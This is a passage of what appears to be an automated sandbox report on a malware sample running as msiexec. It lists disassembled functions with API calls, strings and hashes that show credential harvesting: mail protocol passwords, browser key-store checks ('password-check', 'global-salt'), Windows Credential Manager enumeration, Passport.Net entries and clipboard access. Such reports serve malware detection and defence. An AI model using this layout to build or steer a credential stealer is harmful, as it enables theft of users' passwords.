                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                    • String ID:
                                                                    • API String ID: 577244452-0
                                                                    • Opcode ID: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                    • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                    • Opcode Fuzzy Hash: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                    • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                    Function 00404487 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                    • _strcmpi.MSVCRT ref: 00404518
                                                                    • _strcmpi.MSVCRT ref: 00404536
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _strcmpi$memcpystrlen
                                                                    • String ID: imap$pop3$smtp
                                                                    • API String ID: 2025310588-821077329
                                                                    • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                    • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                    • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                    • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                    Function 0040C00D Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040C02D
                                                                      • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                      • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                      • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                      • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                      • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                      • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                      • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                      • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                      • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                      • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                      • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                    • API String ID: 2726666094-3614832568
                                                                    • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                    • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                    • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                    • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                    Function 00403A61 Relevance: 9.1, APIs: 6, Instructions: 57filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00403A88
                                                                    • memset.MSVCRT ref: 00403AA1
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                                                    • strlen.MSVCRT ref: 00403AE9
                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                    • String ID:
                                                                    • API String ID: 1786725549-0
                                                                    • Opcode ID: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                    • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                                                    • Opcode Fuzzy Hash: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                    • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                                                    Function 0040613B Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                      • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                      • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                      • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                    • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                    • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                    • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcmp$memcpy
                                                                    • String ID: global-salt$password-check
                                                                    • API String ID: 231171946-3927197501
                                                                    • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                    • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                    • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                    • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                    Function 00443473 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID:
                                                                    • API String ID: 613200358-0
                                                                    • Opcode ID: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                                    • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                    • Opcode Fuzzy Hash: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                                    • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                    Function 00401694 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetClientRect.USER32(?,?), ref: 004016A3
                                                                    • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                    • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                    • BeginPaint.USER32(?,?), ref: 004016D7
                                                                    • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                    • EndPaint.USER32(?,?), ref: 004016F3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                    • String ID:
                                                                    • API String ID: 19018683-0
                                                                    • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                    • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                    • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                    • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                    Function 004063B2 Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040644F
                                                                    • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                    • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                      • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                      • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                    • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                    • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                    • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                    • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                      • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memset
                                                                    • String ID:
                                                                    • API String ID: 438689982-0
                                                                    • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                    • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                    • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                    • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                    Function 0044493E Relevance: 8.9, APIs: 7, Instructions: 147stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0044495F
                                                                    • memset.MSVCRT ref: 00444978
                                                                    • memset.MSVCRT ref: 0044498C
                                                                      • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                    • strlen.MSVCRT ref: 004449A8
                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                                                    • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                      • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                    • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpymemset$strlen
                                                                    • String ID:
                                                                    • API String ID: 2142929671-0
                                                                    • Opcode ID: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                                                    • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                                                    • Opcode Fuzzy Hash: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                                                    • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                                                    Function 0040F6E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                      • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                    • strlen.MSVCRT ref: 0040F7BE
                                                                    • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                    • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                    • String ID: Passport.Net\*
                                                                    • API String ID: 2329438634-3671122194
                                                                    • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                    • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                    • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                    • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                    Function 004032B7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                    • memset.MSVCRT ref: 0040330B
                                                                    • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                    • strchr.MSVCRT ref: 0040335A
                                                                      • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                    • strlen.MSVCRT ref: 0040339C
                                                                      • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                    • String ID: Personalities
                                                                    • API String ID: 2103853322-4287407858
                                                                    • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                    • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                    • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                    • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                    Function 004309ED Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 238COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                                    • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                                    • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                    • API String ID: 3510742995-272990098
                                                                    • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                    • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                                                                    • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                    • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                                                                    Function 0043D62C Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 224COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID: H
                                                                    • API String ID: 2221118986-2852464175
                                                                    • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                    • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                    • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                    • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                    Function 0042563B Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 176COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                    • API String ID: 3510742995-3170954634
                                                                    • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                    • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                    • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                    • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                    Function 0041DB51 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0041384F: memcpy.MSVCRT(?,00417664,00000004,?,CwA,00417664,?,?,00417743,?,?,?,?), ref: 0041385C
                                                                    • memcmp.MSVCRT(?,?,00000004,00000000,?,?,0041DE5E,?,?,?,?,00436073), ref: 0041DBAE
                                                                    • memcmp.MSVCRT(?,SQLite format 3,00000010,00000000,?,?,0041DE5E,?,?,?), ref: 0041DBDB
                                                                    • memcmp.MSVCRT(?,@ ,00000003,?,?,?,00000000,?,?,0041DE5E,?,?,?), ref: 0041DC47
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcmp$memcpy
                                                                    • String ID: @ $SQLite format 3
                                                                    • API String ID: 231171946-3708268960
                                                                    • Opcode ID: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                    • Instruction ID: bab8e9e22e0f3e3322208b515ecc9156aa125374c4e71f07eecd891e4e8170cf
                                                                    • Opcode Fuzzy Hash: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                    • Instruction Fuzzy Hash: 1851BFB1E002099BDB20DF69C981BEAB7F4AF54304F10056FE44597742E7B8EA85CB98
                                                                    Function 00414625 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 132COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memset
                                                                    • String ID: winWrite1$winWrite2
                                                                    • API String ID: 438689982-3457389245
                                                                    • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                    • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                    • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                    • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                    Function 004144FD Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 109COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpymemset
                                                                    • String ID: winRead
                                                                    • API String ID: 1297977491-2759563040
                                                                    • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                    • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                    • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                    • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                    Function 00449550 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0044955B
                                                                    • memset.MSVCRT ref: 0044956B
                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpymemset
                                                                    • String ID: gj
                                                                    • API String ID: 1297977491-4203073231
                                                                    • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                    • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                    • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                    • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                    Function 0040C143 Relevance: 7.6, APIs: 5, Instructions: 54clipboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                    • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                    • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                    • GetLastError.KERNEL32 ref: 0040C1CA
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Temp$ClipboardDirectoryErrorFileLastNameOpenPathWindows
                                                                    • String ID:
                                                                    • API String ID: 1189762176-0
                                                                    • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
